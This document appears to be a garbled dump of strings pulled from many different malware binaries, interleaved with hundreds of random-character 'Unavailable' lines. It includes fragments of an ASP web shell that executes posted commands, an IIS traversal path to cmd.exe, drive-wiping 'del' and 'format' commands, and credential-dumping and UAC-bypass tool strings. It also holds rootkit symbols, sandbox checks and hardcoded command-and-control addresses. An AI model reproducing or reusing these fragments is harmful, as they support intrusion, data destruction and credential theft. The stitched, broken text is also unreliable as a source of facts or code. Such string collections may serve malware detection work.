*.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
Unavailable neolite
Unavailable iuj`
Unavailable >i8v@
Unavailable 6q(m
Unavailable ineia
Unavailable #znan
Unavailable k?ztetvo
Unavailable f*q>s
Unavailable r$iq
Unavailable i_ds
Unavailable wqkw
Unavailable \\\\.\\slidttool[*] token system command[*] command add user 90sec 90sec[*] add to administrators success[*] user has been successfully addedprogram: %s%s%s%s%s%s%s%s%s%s%sc
Unavailable b00dc:
Unavailable uxi;
Unavailable fzg)nn
Unavailable -\$g0
Unavailable \\filedisk\\disk\\disk\\objfre\\i386\\disk.pdbiocreatefilehook.pdbnot bindednot listenedzebro_mainfixedid:dinamicid:url:/vncommqry.%3p~|$+k}b,#5da+zyasvi+k}b,#5da+tywnxsmicrosoft.exchange.clientsowaauthe
Unavailable bjtw
Unavailable cxp\,
Unavailable =ql("
Unavailable y-h`#
Unavailable tjfy
Unavailable usage: %s targetip protocolsequence portno [redirectorip] [clsid]key does not exist or pinging w2k systemrpcproxy=255.255.255.255:65536.dllfdkhsppxud$8.exe\
Unavailable ez=k
Unavailable qovf"
Unavailable s#75a
Unavailable d<pi
Unavailable @8|$^t
Unavailable k;ft
Unavailable trm_hookcallback(non-win32 .exe or error in .exe image).pass hacker@hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exemail from:hacker@hacker.comhttp://isno.yeah.netset serviceobj = getobject(\"winnt://\" & objnet.computername & \"/w3svc\")wscript.echo \"usage:killlog.vbs logfilename yourip.\"set txtstreamout = fso.opentextfile(destfile, forwriting, true)set objnet = wscript.createobject( \"wscript.network\" )set fso = createobject(\"scripting.filesystemobject\")2tinject.dllwindows servicesfindrst6press any key to continue......if not exist %1\\rshsetup.exe goto error2echo rshsetup.exe is not found in the %1 directoryrem %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dllcopy %1\\rshsvc.exeecho use \"net start rshsvc\" to start the service.rshsetup %systemroot%\\system32\\rshsvc.exe %systemroot%\\system32\\rshsvc.dllpushd %systemroot%\\system32newgina.dllwlxactivateusershellwlxwkstalockedsaswlxislockokwlxshutdown\\scanner.ini\\scanner.exe\\scanner.lst\\hensss.lsts
Unavailable nl=[w
Unavailable x41k
Unavailable ;=58fp
Unavailable d$@p
Unavailable q00dc
Unavailable w[l$
Unavailable q~:5}
Unavailable vgd1
Unavailable vb5chs.dllmsvbvm50.dllsystem.dllset sys=server.createobject (\"system.contral\") public function reboot(atype as variant)t& = exitwindowsex(1, atype)atype=request(\"atype\") aceivex dlldeclare function exitwindowsex lib \"user32\" (byval uflags as long, byval sys.reboot(atype)' -- check for a command that we have posted -- 'sztempfile = \"c:\\\" & ofilesys.gettempname( )<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"><body><input type=text name=\".cmd\" size=45 value=\"<%= szcmd %>\">call oscript.run (\"cmd.exe /c \" & szcmd & \" > \" & sztempfile, 0, true)szcmd = request.form(\".cmd\")%s server.exeservice port: %sthe port must been >0 & <655353--set server portthe server password exceeds 32 charactersservice name: %sserver password: %sinject process name: %swineggdrop shell congiratorerror get globalgroup memebers: nerr_invalidcomputererror get users from server!get in nt by name and nullget something from nt, hold by killusa.logon.exedomain and user:pid=get addr$(): onepsapi.dllkt
Unavailable sys\\mstcp32.dbg%
Unavailable %4@@
Unavailable un?>u
Unavailable 1-)@
Unavailable up%p
Unavailable >jgx
Unavailable |\nmr_temp.nmr
Unavailable $!p:
Unavailable 3sor
Unavailable uykqt
Unavailable qi'3
Unavailable secur32.dll
Unavailable ,,e#
Unavailable owz#nowg
Unavailable \$ h
Unavailable >jtm}s
Unavailable (]fq
Unavailable /_y>
Unavailable s`m]
Unavailable c(tx
Unavailable (t$@
Unavailable 00dc=
Unavailable h9=}m
Unavailable `! :
Unavailable si=v
Unavailable |mex
Unavailable thcd&
Unavailable rz5c
Unavailable w3=ja
Unavailable shadowtechdownloadcontainersystem.configuration#
Unavailable yvu9
Unavailable ]2i}c(
Unavailable createprocessa
Unavailable ydqrchzonufe
Unavailable c.wrh:
Unavailable atan
Unavailable ikdpcj
Unavailable e<\y
Unavailable (online banking)|(online banking)(e-banking)|(e-banking)e
Unavailable -jym
Unavailable `vftable'
Unavailable so(h
Unavailable abrkh>
Unavailable '5js
Unavailable wqr;
Unavailable ;>9l
Unavailable getmodulehandlea
Unavailable /c del /f /s /q %c:\\*.*shutdown /r /t %d/
Unavailable xj :
Unavailable bmu<
Unavailable +pdh[,=
Unavailable setelise.pdbelisedll.dllesentryeshandle/
Unavailable h+1h
Unavailable ev?m
Unavailable copyright (c) 1998,1999 neoworx inc
Unavailable pc^ws!
Unavailable samlibshcreateitemfromparsingname
Unavailable iogetrelateddeviceobject\\registry\\machine\\system\\currentcontrolset\\servicespsgetcurrentprocessid\
Unavailable gzj~j
Unavailable 'dx?
Unavailable ^m-,
Unavailable s4lw
Unavailable l1#:
Unavailable {~pu
Unavailable 611`e
Unavailable 9=)s
Unavailable l'f[b)
Unavailable /ye<
Unavailable ss0j
Unavailable 69ta3
Unavailable u=@@
Unavailable the implant failed to return a valid status-
Unavailable 8csm
Unavailable wwdl
Unavailable %-lq
Unavailable r`,t
Unavailable #6"t
Unavailable =cq6
Unavailable t_ooww3=xxwx5 2py5w3p_-l.p-kd1ep-olpz-pjp-pw40pqx5fspu
Unavailable shellfolddefaultphotligh[
Unavailable d$]e
Unavailable l!a$
Unavailable l!g+
Unavailable tph95a
Unavailable |#@01wb
Unavailable oa$owf^
Unavailable s342
Unavailable rcyo'
Unavailable <b>login information captured</b><br>user: %s<b>clipboard data captured</b><br>user: %sremoteexecwin32_processconnectserverroot\\cimv2impersonationlevelvarstorenumberintmicrosoft .net framework 2.0a: return type:i
Unavailable vwwv
Unavailable , inc. 2002icmp timeunable to open target process: %d, pid %dcouldn't delete target executable from remote machine: %dtarget: failed to load sam functions.error writing the test file %s, skipping this sharefailed to create service (%s/%s), error %dservice start failed: %d (%s/%s)pwdump.exegetavailablewriteableshare returned an error of %ld:\\\\.\\pipe\\%scouldn't copy %s to destination %s. (error %d)dump logon sessiontimed out waiting to get our pipe backsetnamedpipehandlestate failed, error %d%s\\%s.exe%s -<listen|tran|slave> <option> [-log logfile][-] gethostbyname(%s) error:%se:\\vs 2008 project\\htran\\release\\htran.pdb[server]connection to %s:%d error-tran <connectport> <transmithost> <transmitport>[-] error: must supply logfile name.[-] there is a error...create a new connection.[+] accept a client on port %d from %s======================== htran v%s =======================[-] socket listen error.[-] error: open logfile-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d ......recv %5d bytes from %s:%d[+] ok! i closed the two socket.[+] waiting another client on port:%d....[+] accept a client on port %d from %s ......-listen <connectport> <transmitport>%systemroot%\\system32\\svchost.exe -k sqlserver%s\\sqlsrv32.dll%s\\sqlsrv64.dll%s\\%d.tmpservicemaix180.150.228.102upload failed! [remote error code:
Unavailable eyza%sc
Unavailable (44y
Unavailable !"a*
Unavailable '^1;
Unavailable naf0>
Unavailable ]'>h
Unavailable \r\y#
Unavailable |:*q
Unavailable epsakq3
Unavailable [d:=
Unavailable w@01wb
Unavailable 8[oa
Unavailable rgv
Unavailable g~00dc]
Unavailable target is share namecould not make udpnetbios header -- bailingrequest non-nt session key* listening post dll %s() returned error code %d.wsaerrortoomanyprocessesservererrorbadnamepassword*
Unavailable #6tj1
Unavailable e20u
Unavailable +kfv
Unavailable jetn>
Unavailable dsvw
Unavailable rsf;\$
Unavailable 5q+00dc
Unavailable 3?('
Unavailable portions copyright (c) 1997-1999 lee hasiukwinnt\\system32\\stdole2.tlbg
Unavailable -i:@1s9
Unavailable tufo
Unavailable h(yc
Unavailable httc
Unavailable cu01wb
Unavailable +i0:
Unavailable x`yb+=
Unavailable waitforsingleobjectex
Unavailable hijaak 2`
Unavailable qltyk
Unavailable svw1
Unavailable in l
Unavailable ?fim
Unavailable itsf
Unavailable t\f>
Unavailable {7_.
Unavailable qeow
Unavailable [3g(
Unavailable vfff
Unavailable eephq
Unavailable usage: %s [-h] [-v] [-t target] [-u username] [-p password][assuming one session already existed or target is null.]heapalloc() failed for ansiservererror : fail to enumerate current sessionerror : fail to get session datafail to search lsass datakerberos.dlllivessp.dllwdigest.dlltspkg.dlllsasrv.dlltmp.dat?getmsgproc@@ygjhij@zishkmsjetodb.dll
Unavailable 4azi3
Unavailable $ygukvm
Unavailable portlistfno.533.netexitfckappfree.dllk
Unavailable aphu{].%
Unavailable getreadyfordeadpru\
Unavailable sqrw
Unavailable ,/<-w
Unavailable ~yyj
Unavailable l97u
Unavailable getcpinfo
Unavailable `cg[
Unavailable `_snlf?
Unavailable (p\c
Unavailable vprotect
Unavailable +.\\
Unavailable !%f&r
Unavailable ^z_y[]
Unavailable g1jt9
Unavailable .[h@/
Unavailable 3lfa
Unavailable % ,d
Unavailable |d%nq
Unavailable +3c8
Unavailable innosetupldrwindow
Unavailable 1ef0d55861681d4d208ec3070b720c21d885cb35popthatkitty.resources.resourcesu4tsotmpm)
Unavailable |0w{(
Unavailable f+ul
Unavailable d:\\hkdoor_src\\hkdoor_src\\hkdoor_src\\hkdoor_src_x32\\filterdriver\\release\\drvfltip.pdbsniffitmyworkstart%s\\sadeep.dll%s\\cangur.dathttp:%sport:%d&ver=cobra 1.2&mark=&id=noid&end=1 %d.%d&l_ip=drive=%c:&#1a&2b@doublesafezmunk:vistawin2000win2003win2003r2win2008win2008r2win2012win32swin7win8win95win95osr2win98win98sewinmewinxp%hso
Unavailable zh<p
Unavailable q@u8
Unavailable ckub
Unavailable cp0#
Unavailable %x@@
Unavailable %l0@
Unavailable rta]
Unavailable 6$&n
Unavailable rouninitialize
Unavailable /#sd/
Unavailable vlj "
Unavailable !jj%
Unavailable form.z1form.z2tobinary(tobase64(\"->\"&\"|\")createfile szconfigpath errordecrypt old sname error is running!
Unavailable freeconsoleprocess writeparameterfilesstockmasterinsertemailfax
Unavailable d~h9-
Unavailable )vr"@
Unavailable ]01wb
Unavailable coclass
Unavailable s@'q3\
Unavailable ~gk~
Unavailable ft4d+
Unavailable ym0dz
Unavailable m&"<q
Unavailable ayu/
Unavailable pne];
Unavailable t$(r
Unavailable ac&8
Unavailable getversion
Unavailable rux{
Unavailable i(`}
Unavailable jc4jwl
Unavailable craatepipea
Unavailable d$pm
Unavailable o\rp
Unavailable `anonymous namespace'
Unavailable g*lx4
Unavailable }#yz
Unavailable t4a+
Unavailable 3h`>}0n
Unavailable &vxo
Unavailable )ie+
Unavailable \\stringfileinfo\\%s\\fileversionclsid\\%s\\auxclsidlnkfile\\shellex\\iconhandler%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu gmt%smutex\\shelliconcache+6service pack procdatawrapimagehlp.dlldnlibsh%
Unavailable ldt(-
Unavailable a^_]
Unavailable ot6;vm^]
Unavailable $=5\
Unavailable [xy~
Unavailable www.webtoolmaster.com
Unavailable v!4jc
Unavailable d$ e3
Unavailable rsfx
Unavailable sf):
Unavailable 'uuz#
Unavailable ;sib
Unavailable select a.user from sys.user_users a oci 8 - ocidescriptorfreeoracommand *msvbvm60.dll_cicosckmhv0
Unavailable ffsh
Unavailable '{$bp;
Unavailable 2pen
Unavailable p5ge
Unavailable vh(l
Unavailable u;e3
Unavailable d0: 2:cin
Unavailable %c:\\~tmp%08x.tmp%s%08x.tmp.
Unavailable short
Unavailable `hhwc
Unavailable %(yt
Unavailable m0:{v
Unavailable i6q1
Unavailable ndnoy=
Unavailable :s+d
Unavailable vgiw
Unavailable mpo=
Unavailable f=:i
Unavailable address: 0x
Unavailable extern "c"
Unavailable getstartupinfow
Unavailable lfpa
Unavailable h5kx
Unavailable h3*note: this version of setcallback does not work with peddlecheap versions priorusage: setcallback <input file> <output file>dfreader.exe logfile aeskey [-j] [-o outputfilename]double feature target versiondoublefeature process id
Unavailable :n2qz
Unavailable iio/
Unavailable lame3.99.5uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
Unavailable qvg"
Unavailable dx5bt
Unavailable 7*yl
Unavailable =sgw
Unavailable h4hc
Unavailable ?@hx
Unavailable r^\ai\op<r
Unavailable )))))))
Unavailable d$ ps
Unavailable )t$
Unavailable fxo(9^
Unavailable (aem
Unavailable n\oq
Unavailable 40w@=/
Unavailable lgsjr
Unavailable suv`
Unavailable %x"8'
Unavailable t2d+
Unavailable yav-
Unavailable yyyyyyyyyyyyyyyy?a73957838_2@@yaxxz?a84884@@yaxxz?b823838_9839@@yaxxz?e747383_94@@yaxxz?e83834@@yaxxz?e929348_827@@yaxxz7
Unavailable "s6;
Unavailable (|$pl
Unavailable .text
Unavailable 0a_a\_
Unavailable a^_^
Unavailable hx\c
Unavailable @2&@
Unavailable hhuc
Unavailable advapi32.dll
Unavailable !$+'
Unavailable gbr[:>5
Unavailable ulwg^r
Unavailable t$f
Unavailable 29yy
Unavailable un{o
Unavailable l$ watauavawh
Unavailable `zv"%
Unavailable /x86/bypassuac.exe/x64/bypassuac.exe/x86/bypassuacdll.dll/x64/bypassuacdll.dllafx_idp_command_failurew
Unavailable q4lc
Unavailable 14rg#h
Unavailable e)#`
Unavailable '[c/
Unavailable authe
Unavailable wl|%
Unavailable hlp@
Unavailable l$@h3
Unavailable ~w]]s
Unavailable pklite copr. 1990-1995 dcu2
Unavailable (sy2
Unavailable *:-x
Unavailable g201wb
Unavailable ywea
Unavailable +h->|
Unavailable getxstatefeaturesmask
Unavailable gx@j
Unavailable 1gn46
Unavailable >r@'t
Unavailable cp*@
Unavailable \oyd
Unavailable de^si
Unavailable content-length: %d
Unavailable lhm+
Unavailable jay\g
Unavailable ibrd
Unavailable sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dllhardware\\description\\systemsystembiosversionqemuhardware\\devicemap\\scsi\\scsi port 0\\scsi bus 0\\target id 0\\logical unit id 0identifiervboxsoftware\\oracle\\virtualbox guest additionsvideobiosversionvirtualboxvmwaresoftware\\vmware, inc.\\vmware toolswine_get_unix_file_namevmxhf
Unavailable b'kg
Unavailable sc;e=4
Unavailable n$"a^
Unavailable g4lc
Unavailable 3}r s
Unavailable w"pn
Unavailable %0@@
Unavailable u\)d
Unavailable .rsrc
Unavailable mu>9
Unavailable %,*8
Unavailable ux<v2
Unavailable ^k/m
Unavailable or%!r-
Unavailable c>v\j
Unavailable getmodulefilenamea
Unavailable vola
Unavailable %x->%x, icmp type %d, code %d\
Unavailable ar;'
Unavailable ^g1'91
Unavailable flushfilebuffers
Unavailable {b*h
Unavailable =:c%
Unavailable '2fo
Unavailable yl/01wb
Unavailable svrg.pdbw32pservicetablein formareleasefastmutexr0omp4arh.text\
Unavailable f9(t
Unavailable `dynamic atexit destructor for '
Unavailable d$>file too large! must be less than 655360 bytes.c:\\ntevt.pdbaraspvuazayax_^]zy[xh
Unavailable rza3
Unavailable september
Unavailable initializeslisthead
Unavailable smwn7n
Unavailable h3select * from win32_process\
Unavailable ppswvppwinscard.dll/
Unavailable s`_3
Unavailable 74lc
Unavailable cb]`n
Unavailable j{.y
Unavailable igfhsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsysti
Unavailable uh\?@
Unavailable s"a36
Unavailable <?xml version='1.0' encoding='utf-8' standalone='yes'?>
Unavailable 3,31363h3p3m3u3z3</svg>location.href='httprndbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaakeme132.dllklospad.pdbabcxyz11!dmalock!dmalock3.0!dmalock4.0fso.gettempname();tmp_path = tmp_path.replace('.tmp', '.exe')var shell = new activexobject('wscript.shell');shell.run(t'zoomit - sysinternals: www.sysinternals.comm
Unavailable ex.dll
Unavailable a<url>k__backingfield<runhidden>k__backingfielddownloadandexecute-
Unavailable cmdprocessexitedrootdirgetnativesysteminfo%08x%08x%08x%08xc
Unavailable /[(-(e
Unavailable ["93
Unavailable y9t$
Unavailable p3}-
Unavailable bjr;
Unavailable lhgi
Unavailable (o:8
Unavailable c(2[
Unavailable a&.m
Unavailable ^3|j
Unavailable =s#i
Unavailable 58p1
Unavailable *xx3r
Unavailable toa+
Unavailable (`+qy
Unavailable e:\\1510prj\\
Unavailable t$xd
Unavailable polyene
Unavailable =g\x
Unavailable k/tu
Unavailable %g2f
Unavailable f-3d
Unavailable $n+je
Unavailable 'x_`4
Unavailable <r2v
Unavailable [_^]
Unavailable 0-i~=
Unavailable j/,o
Unavailable -gf6
Unavailable mel'o
Unavailable j<6
Unavailable 1n9e51&
Unavailable gbnu
Unavailable fwpsreferencenetbufferlist0{3ec05b4a-ea88-1378-3389-66706ba27600}master secretmyengineneteventcannot execute (%d)svcnameusers\\wool3n.h4t\\c-cpp\\cwoolgern
Unavailable ixdi
Unavailable zc|="
Unavailable b/^_
Unavailable s`h!g#
Unavailable al=%
Unavailable d$<s
Unavailable 5z3@
Unavailable d$8<d
Unavailable -?'l
Unavailable +jsl
Unavailable - /p
Unavailable i00dc
Unavailable d$(3
Unavailable ;;zga`
Unavailable tnni
Unavailable -rqa
Unavailable gdgsydlyr_%lxmainexecvecp -a %s %sdbus-daemon--noprofile--norcterm=vt100/proc/%u/cmdlineloadso/proc/self/exeproxy-connection: keep-alivehost: %s:%dproxy-authorization: basic %sserver: apacheproxy-authenticategettimeofdaypthread_mutex_initpthread_mutex_destroypthread_mutex_lockgetsockoptsetsockoptopendirreaddirclosedirrename__this_moduleinit_moduleunhide_pidis_hidden_pidclear_hidden_pidlicensesrcversion=depends=vermagic=current_tasksock_releasemodule_layoutinit_uts_nsinit_netinit_taskfilp_open__netlink_kernel_createkfree_skb
Unavailable c;gg\
Unavailable 5-~k
Unavailable si"h
Unavailable %sexpires on : %04d-%02d-%02d %02d:%02d:%02d178.162.197.9\
Unavailable s&uy
Unavailable x<>l
Unavailable *f"0
Unavailable m0e3
Unavailable l$(l
Unavailable ?|^j
Unavailable fclose
Unavailable private:
Unavailable 11y@
Unavailable +r3
Unavailable q+hf
Unavailable p&f;
Unavailable c}6i
Unavailable infoisft
Unavailable dn$\_b
Unavailable ey/k/$
Unavailable `_pagelk
Unavailable ~!p.
Unavailable fb9<@u
Unavailable $(k2
Unavailable rdsw+y
Unavailable ~dxz
Unavailable !ddd
Unavailable 4wy\
Unavailable 9=91
Unavailable ma:
Unavailable c4c (
Unavailable hddc
Unavailable `rr9
Unavailable tmp.
Unavailable j} j
Unavailable s#u9
Unavailable e-9;4
Unavailable `^xgf
Unavailable qjb)g
Unavailable x1.21
Unavailable xfi{
Unavailable l;:9
Unavailable @82u
Unavailable um.<
Unavailable m6c;~y<s;4v&
Unavailable watcom c/c++32 run-
Unavailable l}ds
Unavailable !n$=o
Unavailable @h`3
Unavailable ;;`k
Unavailable urls
Unavailable k=zy
Unavailable l$ 3
Unavailable o<zu
Unavailable w\ue
Unavailable 7 8#
Unavailable "fi-l
Unavailable kuth76gbbg674v88gy
Unavailable neo,welcome to the desert of real.sysin.logsysout.logsystemp.logv1.0v1.0exfile too big!%sosinfo.datdon't find cmd.exe,please check again or upload the program!7db30d27130508os32__%d.iniusrer__%d.iniusr32__%d.ini3
Unavailable sqlite format 3
Unavailable pvf;
Unavailable qamo ~z
Unavailable ag3
Unavailable v:~vf
Unavailable vb5!
Unavailable l$(h
Unavailable `@mf3i
Unavailable &.xt
Unavailable ):-u
Unavailable c%%7
Unavailable @suvwatavawh
Unavailable zq1}yxku
Unavailable x/4b
Unavailable d$x3
Unavailable 8hz/h
Unavailable qo@s
Unavailable msvcp60.dll
Unavailable 600dc
Unavailable %x:%d->%x:%d, flag %s%s%s%s%s, seq %u, ackseq %u, datalen %ufwpkclnt.sysp
Unavailable t$df;
Unavailable \:64
Unavailable 06<+04u
Unavailable r_g)sb
Unavailable xpppyziqd[l-f6-g41gdsxu'@,~p^p_o,!(gu(gz(gnu5-netsend_v1.00_jrt=
Unavailable l$p3
Unavailable 03kiz^h
Unavailable usercontrol-v80.exem
Unavailable 8,z@
Unavailable 8pht
Unavailable p\r:
Unavailable a/f]wx
Unavailable s9:[
Unavailable 4>ck
Unavailable comctl32.dll
Unavailable 0<9v
Unavailable @+&p
Unavailable qxlr
Unavailable .?av_com_er1.22
Unavailable ":x1
Unavailable 3~hfsr
Unavailable $khjt
Unavailable uvo(
Unavailable 5&j6
Unavailable $wdu
Unavailable +uh/
Unavailable __cdecl
Unavailable dvsl
Unavailable &~z6
Unavailable rnf;\$<
Unavailable zce[
Unavailable i!'[
Unavailable apl{
Unavailable this application cannot run with an active debug
Unavailable qu<q
Unavailable p_^]
Unavailable lk+m
Unavailable not deleting...copyservicetoremotemachinedh exchange failedconnecttonamedpipes3
Unavailable l9d$p
Unavailable december
Unavailable mzre`
Unavailable crcp
Unavailable `wvsqru
Unavailable !prt
Unavailable oq1k
Unavailable b.%16
Unavailable @-yh
Unavailable /update?id=%8.8x
Unavailable \&]l
Unavailable "n*h$%k7
Unavailable (lr`x+]
Unavailable |$(d
Unavailable g[ya
Unavailable ai9#,
Unavailable pylt
Unavailable u#xgh
Unavailable gets
Unavailable 6)01wb
Unavailable t dd
Unavailable c7q~$cv00dcw
Unavailable comctl32.dllu
Unavailable e00dcc
Unavailable explorer.exe \"favorites.datcomspeca
Unavailable z|vq
Unavailable lw/t
Unavailable seed\x00prot\x00ownin\x00feed0\x00nown\x00sinkholedynadotmalwtrojanabusespambootkit_dll.dll
Unavailable kernel32.d3
Unavailable |$`s
Unavailable f|ivj
Unavailable f9<bu
Unavailable }r\j
Unavailable 00dcy
Unavailable kd/l
Unavailable x atavawh
Unavailable %nf\
Unavailable k3/k
Unavailable [!wd
Unavailable kernel32.dllmsvcrt.dllloadlibraryagetprocaddress
Unavailable d$?n
Unavailable s'olb
Unavailable %{#0
Unavailable (32d
Unavailable !j~b
Unavailable o<"^
Unavailable cn(_
Unavailable zkto
Unavailable tt+'
Unavailable 8"ua
Unavailable cp&)4f
Unavailable 1x00dc
Unavailable 5noobyprotect se 1.1.0.0
Unavailable template-parameter-
Unavailable e)uwuqc
Unavailable lx;y
Unavailable +?1"
Unavailable "abl
Unavailable bbyt
Unavailable %lws
Unavailable o)8\
Unavailable \$xm
Unavailable z3d\
Unavailable i`h(_'r
Unavailable hs?d
Unavailable otqv
Unavailable kernel32
Unavailable getconsolemode
Unavailable cg^us
Unavailable d0<j
Unavailable re^]
Unavailable cpports.txt,get / http/.}f
Unavailable @fb
Unavailable qpot'i
Unavailable l$@f
Unavailable aa<fu
Unavailable *q_4i
Unavailable k_wpp$
Unavailable 3psb
Unavailable d$0a
Unavailable +n7@[
Unavailable seeo
Unavailable b.xs
Unavailable +uslbp>
Unavailable vwsx
Unavailable {""gk
Unavailable `vector deleting destructor'
Unavailable xilu
Unavailable tyfd9 tsh
Unavailable .ni>
Unavailable l}yso
Unavailable t$h+
Unavailable [yr4 |
Unavailable lh^!
Unavailable rsa-alt%
Unavailable :|]#[-
Unavailable !av8-o
Unavailable cub!<
Unavailable tcp_keepcnt
Unavailable m0in
Unavailable l1(l
Unavailable su"p
Unavailable 0@lr
Unavailable x%c-
Unavailable dp!po
Unavailable z%`>
Unavailable *v{:z
Unavailable `exb
Unavailable zx3k`
Unavailable 5v"5
Unavailable s-%u-%u$9e
Unavailable =6jo>
Unavailable =dgw
Unavailable $p)#
Unavailable %!ps-adobe-3.0 epsf-3.0
Unavailable d$hf;
Unavailable h3e h3e
Unavailable hrjq
Unavailable y]hg
Unavailable \dap
Unavailable {a*h
Unavailable ,p}oc@
Unavailable iv4r
Unavailable dy>ug~
Unavailable 7fhv
Unavailable xc'e
Unavailable wb)}c
Unavailable q@!@f0
Unavailable %p@@
Unavailable f~ii~
Unavailable uhl<
Unavailable /y%s;
Unavailable a^_^[]
Unavailable [9xk
Unavailable fa#!@hdx
Unavailable %k}v[
Unavailable swhp
Unavailable t$`f;
Unavailable .xb&2
Unavailable *>f[
Unavailable <ior.e0
Unavailable t$`2
Unavailable <^rae
Unavailable h#tz
Unavailable 1w+)
Unavailable dafsr
Unavailable `local static destructor helper'
Unavailable <#vg
Unavailable 0ur:
Unavailable eg|
Unavailable fpfxf
Unavailable yb?h
Unavailable ^($f+
Unavailable e2]u
Unavailable ,=eb
Unavailable }ng;
Unavailable |$8a
Unavailable h,=;v
Unavailable content-disposition: inline; comp=%s; account=%s; product=%d;zhcat -l -h -tp 1234a
Unavailable class hierarchy descriptor'
Unavailable 6)iz
Unavailable w?])
Unavailable user32.dll
Unavailable #1p%`c
Unavailable bqjyt
Unavailable not found
Unavailable regqueryvalueexa
Unavailable 7c y
Unavailable /tag=info&id=15\\temp\\iexplorer.exe\\temp\\\"tsg\"greensky27.vicp.net\
Unavailable ------ created by a. fisun, 1994-2003 ------
Unavailable ,:*e
Unavailable "qfw
Unavailable spq6
Unavailable hirt5
Unavailable bhbh
Unavailable s}af
Unavailable 1.20
Unavailable hu,`
Unavailable thmx
Unavailable 8l?t
Unavailable uajt
Unavailable e=zb
Unavailable mkb'-
Unavailable <epw
Unavailable neojxh
Unavailable .8jf
Unavailable d$^* the target is iis 6.0 but is not running content indexing servicess,--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]slby default, the shellcode will attempt to immediately connect s$unexpected shellcode configuration errors
Unavailable l$plc
Unavailable p}!%v
Unavailable t(eh
Unavailable --------------------------------------------
Unavailable ?h33h
Unavailable evict1.pdbhttp://testing.corp 08
Unavailable invalid input handle!!!p
Unavailable d$hz
Unavailable x}w;
Unavailable vvb]x
Unavailable getprocrquwdg
Unavailable hg"*
Unavailable ~v~w
Unavailable xc2}
Unavailable #q;{
Unavailable nullfilenameusage: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]you may enter between 1 and 6 ports to change the defaults.sprqwvusage: %s [d|e] session_key ciphertextwhere session_key and ciphertext are strings of hexd = decrypt mode, e = encrypt modebad mode, should be 'd' or 'e'wshtcpip.wshgetsocketinformation\\\\.\\%hs.?avresultip@mini_mcl_cmd_netconnections@@c
Unavailable :ai!
Unavailable ^2vl
Unavailable !uxv
Unavailable rt0"
Unavailable -~2^
Unavailable :ru-
Unavailable eddv
Unavailable a#wzj^2
Unavailable e !?
Unavailable ssgy|
Unavailable yhqj
Unavailable crypto.cipher.aes(mod is null - %sfindnextfile
Unavailable gmi;
Unavailable ssma#7
Unavailable f;1t
Unavailable vb&|
Unavailable k2tknm
Unavailable t^i;
Unavailable pnci
Unavailable @u,[
Unavailable c1o?z"
Unavailable &j/l
Unavailable ~d^{
Unavailable 8"u@
Unavailable e8&i
Unavailable j@2w
Unavailable uavawh
Unavailable xzrymb3
Unavailable 7?g\
Unavailable e."c
Unavailable xl/customproperty1.binisdebuggedntglobalflagscheckremotedebuggerpresentsetinformationthreaddebugactiveprocessqueryperformancecounteroutputdebugstringsetunhandledexceptionfiltergenerateconsolectrleventsetconsolectrlhandlersetthreadcontext__invoke__watson____except__handler3____local__unwind3____except__handler4____local__unwind4__xcptfiltervbaexcepthandleraddvectoredexceptionhandlerremovevectoredexceptionhandlerd
Unavailable qqqqqqsvw
Unavailable hc]`m
Unavailable t$pf;
Unavailable t{h9/tql
Unavailable 3mau
Unavailable *{~jhk
Unavailable int
Unavailable st@q
Unavailable %08x.tmp/c format %c: /y /x /fs:ntfs/c format %c: /y /qt
Unavailable q~9>
Unavailable rla)
Unavailable a_a^a\_]
Unavailable png{\rtf1
Unavailable xyyy
Unavailable h}&"o
Unavailable "r#($
Unavailable ]9i-
Unavailable `udt returning'
Unavailable cd587
Unavailable 00-00-00-00-00-00c:\\users\\ziedpirate.ziedpirate-pc\\desktop\\sop\\sop\\release\\(separate usernames with a comma, or leave blank to monitor all uses.)input usernames here and separate with a comma. leave blank to monitor all users.please enter access password: delivery via email and ftp3
Unavailable union
Unavailable $lq`
Unavailable win 8.1win server 2012 r2win srv 2012win srv 2008 r2win vstawin srv 2003 r2win hm srvwin strg srv 2003win xp prof x64 edtwin 2000d:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\release\\downexecute.pdbd:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\writer.h:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\internal/stack.h<win get version info name errorp@$sw0rd$nd$t@k0v2rf10w|
Unavailable ;cbo
Unavailable 4.{c?
Unavailable __based(
Unavailable l},zx
Unavailable local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}interface\\%s\\infointerface\\%s\\info\\%sclsid\\%s\\info\\%sw
